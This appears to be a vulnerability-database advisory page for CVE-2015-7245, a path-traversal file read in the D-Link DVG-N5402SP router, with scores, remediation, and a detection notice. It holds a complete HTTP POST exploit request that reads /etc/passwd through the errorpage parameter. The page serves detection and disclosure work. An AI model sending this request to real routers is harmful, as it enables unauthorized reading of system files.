🔙 목록으로 돌아가기

CVE-2015-7245: D-Link DVG-N5402SP - Local File Inclusion

TitleD-Link DVG-N5402SP - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
RemediationUpdate the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.87413
CVE IDCVE-2015-7245
CWE IDCWE-22
Tags cve2015 cve dlink lfi packetstorm edb d-link vuln

🔍 Vulnerability Description

D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.

🌐 HTTP Request

POST /cgibin/webproc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 211
Accept-Encoding: gzip

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-7245.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-7245.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A